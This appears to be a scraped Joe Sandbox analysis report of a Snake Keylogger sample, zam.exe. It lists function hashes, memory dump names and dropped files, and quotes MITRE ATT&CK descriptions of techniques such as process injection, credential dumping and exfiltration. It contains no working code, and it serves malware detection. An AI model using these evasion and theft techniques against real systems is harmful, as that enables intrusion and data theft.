Opcode Fuzzy Hash: ccd14b094320cd55905d70637391d5edc776bc89253e8ae700a8b33aa0abf91c
Instruction Fuzzy Hash: 6DC0127113430C4BDD01F765F849615337EF6C5901780D590F04A07515DEBC1C458AB1

Function 0766A9E9 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1355847025.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7660000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb2c9bb82f40066ffc9dd2c82d89151adc2d0cc42ef07345344563bdeb75a0c6
Instruction ID: 4733d5ceff5743a5c1847b1956b4effdf5ff42e9aa4dba37bc2343880dfba05d
Opcode Fuzzy Hash: cb2c9bb82f40066ffc9dd2c82d89151adc2d0cc42ef07345344563bdeb75a0c6
Instruction Fuzzy Hash: 9ED012B105878487D2519FE8B50E3617BF8674521AF88951EE54A11511CB786018C793

Function 0766BE74 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1355847025.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7660000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d898550496066d909c826d42231b79db3012ee1301542ca7b684945fc1f3260
Instruction ID: f32d03ece63068b33243be20cd1bca2d7e869c939b57a7dc9345b4466f16a58c
Opcode Fuzzy Hash: 4d898550496066d909c826d42231b79db3012ee1301542ca7b684945fc1f3260
Instruction Fuzzy Hash: C5C02BBD024100EFC604A740C48CC19B7F0FF46300BC0CC16610AC1030C621CC1CD707

Function 0766A9F8 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1355847025.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7660000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ddf548dd1d5c3c0aab02a2e62364189426153019f25a344e0e461583e5324d1
Instruction ID: 7113e6c16071069afc154409a05e8296a755e8c0ef77ef7a9469c1cac5a07786
Opcode Fuzzy Hash: 7ddf548dd1d5c3c0aab02a2e62364189426153019f25a344e0e461583e5324d1
Instruction Fuzzy Hash: 41B092B205878887D6546BE4B60E324BBB8A74520BF88612AE50E11950DFB9905CC6A6

Non-executed Functions

Function 056C2869 Relevance: 41.7, Strings: 33, Instructions: 439COMMON

Download Yara Rule

Strings

4'q, xrefs: 056C2BC0
4'q, xrefs: 056C296D
4'q, xrefs: 056C2B7A
4'q, xrefs: 056C2CEB
4'q, xrefs: 056C2C3B
4'q, xrefs: 056C2ACB
4'q, xrefs: 056C29F9
4'q, xrefs: 056C2D17
4'q, xrefs: 056C2A85
4'q, xrefs: 056C2D6F
4'q, xrefs: 056C2A1C
4'q, xrefs: 056C2D9B
4'q, xrefs: 056C2CBF
4'q, xrefs: 056C2B34
4'q, xrefs: 056C294A
4'q, xrefs: 056C2B9D
4'q, xrefs: 056C29B3
4'q, xrefs: 056C2E1F
4'q, xrefs: 056C2C0F
4'q, xrefs: 056C29D6
4'q, xrefs: 056C2AEE
4'q, xrefs: 056C2DF3
4'q, xrefs: 056C2A3F
4'q, xrefs: 056C2D43
4'q, xrefs: 056C2C67
4'q, xrefs: 056C2AA8
4'q, xrefs: 056C2A62
4'q, xrefs: 056C2BE3
4'q, xrefs: 056C2C93
4'q, xrefs: 056C2B11
4'q, xrefs: 056C2990
4'q, xrefs: 056C2B57
4'q, xrefs: 056C2DC7

Memory Dump Source

Source File: 00000011.00000002.1354870584.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_56c0000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q
API String ID: 0-78339950
Opcode ID: 424d057a345fc832ba37a6dfff2d32f2ad42ed853abf6bacce87d41904b9d2ed
Instruction ID: 8c7191cfd8fd6062735fd4d080541c051de6839363d09779c82be39f4fa8f178
Opcode Fuzzy Hash: 424d057a345fc832ba37a6dfff2d32f2ad42ed853abf6bacce87d41904b9d2ed
Instruction Fuzzy Hash: C1122F70A1171A8FCB08EF78E89169D7BB2FF44700F5085A9E04AAB251DF746D49CF91

Function 056C2878 Relevance: 41.7, Strings: 33, Instructions: 434COMMON

Download Yara Rule

Strings

4'q, xrefs: 056C2BC0
4'q, xrefs: 056C296D
4'q, xrefs: 056C2B7A
4'q, xrefs: 056C2CEB
4'q, xrefs: 056C2C3B
4'q, xrefs: 056C2ACB
4'q, xrefs: 056C29F9
4'q, xrefs: 056C2D17
4'q, xrefs: 056C2A85
4'q, xrefs: 056C2D6F
4'q, xrefs: 056C2A1C
4'q, xrefs: 056C2D9B
4'q, xrefs: 056C2CBF
4'q, xrefs: 056C2B34
4'q, xrefs: 056C294A
4'q, xrefs: 056C2B9D
4'q, xrefs: 056C29B3
4'q, xrefs: 056C2E1F
4'q, xrefs: 056C2C0F
4'q, xrefs: 056C29D6
4'q, xrefs: 056C2AEE
4'q, xrefs: 056C2DF3
4'q, xrefs: 056C2A3F
4'q, xrefs: 056C2D43
4'q, xrefs: 056C2C67
4'q, xrefs: 056C2AA8
4'q, xrefs: 056C2A62
4'q, xrefs: 056C2BE3
4'q, xrefs: 056C2C93
4'q, xrefs: 056C2B11
4'q, xrefs: 056C2990
4'q, xrefs: 056C2B57
4'q, xrefs: 056C2DC7

Memory Dump Source

Source File: 00000011.00000002.1354870584.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_56c0000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q
API String ID: 0-78339950
Opcode ID: 66e6173190d7792ea82b8c4f75d8f4c21f4dba579ec241aad8071db3b46c48c3
Instruction ID: 6a456facb6cce2aeeee7547b4711db55b22265a2ea2467f3f316860128f98f99
Opcode Fuzzy Hash: 66e6173190d7792ea82b8c4f75d8f4c21f4dba579ec241aad8071db3b46c48c3
Instruction Fuzzy Hash: 50123070A1170A8FCB08EF78E89169D7BB2FF44700F5085A9E04AAB251DF746D49CF91

Function 0766A648 Relevance: 6.5, Strings: 5, Instructions: 259COMMON

Download Yara Rule

Strings

$q, xrefs: 0766A752
,q, xrefs: 0766A94B
Hq, xrefs: 0766A7F2
$q, xrefs: 0766A746
,q, xrefs: 0766A957

Memory Dump Source

Source File: 00000011.00000002.1355847025.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7660000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: ,q$,q$Hq$$q$$q
API String ID: 0-4222069339
Opcode ID: 52f59fe26afb118e05f88977a90f151733f6190dd9ee16843f1afe7a22a7daa3
Instruction ID: 223e19e4cd494943ed426d911ebcf3795c1411b3628afa96b1f795fead739f29
Opcode Fuzzy Hash: 52f59fe26afb118e05f88977a90f151733f6190dd9ee16843f1afe7a22a7daa3
Instruction Fuzzy Hash: 628129B47202158FDB149BB5885D73E3AE7AF85A41BA9C56DD003EB390DF64CC42C791

Function 076650E8 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;q, xrefs: 076650FE
\;q, xrefs: 07665126
\;q, xrefs: 076650F4
\;q, xrefs: 0766511A

Memory Dump Source

Source File: 00000011.00000002.1355847025.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7660000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: \;q$\;q$\;q$\;q
API String ID: 0-2933265366
Opcode ID: a3b904f74a536613055d472ece14707b78906f5c650c15434d5898ca93060ad0
Instruction ID: 7d7242f09490eefbb1e540c89d8ee81aa006c8286d7cba202dc7fbff2c4a77de
Opcode Fuzzy Hash: a3b904f74a536613055d472ece14707b78906f5c650c15434d5898ca93060ad0
Instruction Fuzzy Hash: 3101D4F17104068FC7219E3CC86AA25B3E7AF89761B59426AE407CB362DA71DC528B80

Analysis Process: MSBuild.exePID: 6056, Parent PID: 4212COMMON

Execution Graph

Execution Coverage:	13.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	7.4%
Total number of Nodes:	54
Total number of Limit Nodes:	7

Executed Functions

Function 016B6108 Relevance: 3.0, Strings: 2, Instructions: 515
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hq, xrefs: 016B650E
(oq, xrefs: 016B6642

Memory Dump Source

Source File: 00000015.00000002.3721773463.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_16b0000_MSBuild.jbxd

Similarity

API ID:
String ID: (oq$Hq
API String ID: 0-2917151738
Opcode ID: 63332a89962e1ae45e4c7fd715d14c850a22b5466c99d353247b3872e59996cc
Instruction ID: 064062eedcd8481152644707a18c006e4bc96f6e8199f7b4cbdc2ecef6df264a
Opcode Fuzzy Hash: 63332a89962e1ae45e4c7fd715d14c850a22b5466c99d353247b3872e59996cc
Instruction Fuzzy Hash: F7129E70A002198FDB14CF69C894BAEBBF6FF88304F148569E406EB395DB349D86CB50

Function 016B9170 Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.3721773463.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_16b0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4418b3d091b3bc430a56a24fd7e34b024783ca611b556e95ea99d7dd6a7fdc3b
Instruction ID: 0376485888f9109dc6b423a2589ee876b6cd216e352abf649b1206101da38400
Opcode Fuzzy Hash: 4418b3d091b3bc430a56a24fd7e34b024783ca611b556e95ea99d7dd6a7fdc3b
Instruction Fuzzy Hash: CC8101719006059FC710CF2CDCC0AEABBB9FF85328F548666DA5897355D731E992CBA0

Function 016B215C Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.3721773463.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_16b0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff5ca1abea813cabd2b89e9db4871555555421ecba9b3af4a81a1af450c23850
Instruction ID: aae4f5657e37a1d6a1e897c9e640b251ea3b8328a65a44b9b31c93683a226fa3
Opcode Fuzzy Hash: ff5ca1abea813cabd2b89e9db4871555555421ecba9b3af4a81a1af450c23850
Instruction Fuzzy Hash: EE216A31E443599FCB01DBB89C104DEBBB1FF8A210B2487A7D225B7191E6312905C7A1

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report zam.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HaNkyQWPIIzrnC.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\zam.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0k5wbg0b.xlj.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b54gxdjo.zto.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_copr2d1e.gqy.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f2acl3lh.0ed.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jaksbiav.nwp.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lfvqp55x.bym.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n2bkhcea.iig.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uzxgyaho.dz0.ps1

C:\Users\user\AppData\Local\Temp\tmp8F5A.tmp

Windows Analysis Report
zam.exe

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Application Log: Application Log Content, Cloud Storage: Cloud Storage Access, Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre